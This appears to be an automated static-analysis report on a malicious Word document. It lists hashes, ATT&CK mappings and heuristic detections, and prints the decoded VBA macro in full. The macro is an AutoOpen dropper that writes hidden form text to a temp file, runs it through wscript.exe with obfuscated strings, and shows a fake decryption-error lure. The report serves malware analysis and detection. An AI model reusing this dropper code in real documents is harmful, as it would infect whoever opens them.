Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36c4e65370935cc2…

MALICIOUS

Office (OLE)

355.5 KB Created: 2018-01-26 16:21:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: 40c4c02d1e506a5ffc2939ec0ee8e105 SHA-1: 1aa7f9022518303a4cbb9d7204d2d6dde1221d14 SHA-256: 36c4e65370935cc24d8408627a060a57b1317237abdb71e42633c35735131668
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine that executes the 'armando' function. This function utilizes CreateObject to interact with the file system, constructs a path to a temporary file in the user's special folder, and writes content from a TextBox to this file. It then constructs and executes a command using 'wscript.exe' to run a script from the created file. This indicates a downloader or dropper functionality, aiming to execute a secondary payload.

Heuristics 8

  • ClamAV: Doc.Malware.Praetoria-10007933-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Praetoria-10007933-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1495 bytes
SHA-256: 2d588ed55854f2bf922ca33d1f833953daa985d2c0be928cefe64196f913d33e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Sub armando()
    Dim enihod
    Dim iwribku
    Dim vbsiwribku
    Dim fatlure
    Dim lnygna
    Dim isyzt
    Dim topbirr
    Dim otmezl
    Dim ubtond
    Set dliwinm = CreateObject("Scripting.FileSystemObject")
    otmezl = "ini.daphsarc\"
    Set whavfico = dliwinm.GetSpecialFolder(2)
    enihod = whavfico & StrReverse(otmezl)
    vbsiwribku = UserForm1.TextBox1.Text
    Set ijetuj = dliwinm.OpenTextFile(enihod, 2, True)
    For Each one In Split(vbsiwribku, "|*|")
    ijetuj.WriteLine one
    Next one
    ijetuj.Close
    fatlure = "//b /e:j"
    lnygna = "pt.e"
    ubtond = "wscri" & lnygna & "xe " & fatlure & "script " & enihod
    Shell ubtond, False
    MsgBox "Decryption error! Try again!"
End Sub
Sub AutoOpen()
    armando
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{05522DB9-14C7-46F9-A9C9-1DEA6F42336B}{3BF8CB77-F9CD-479E-8855-A7C554496E00}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False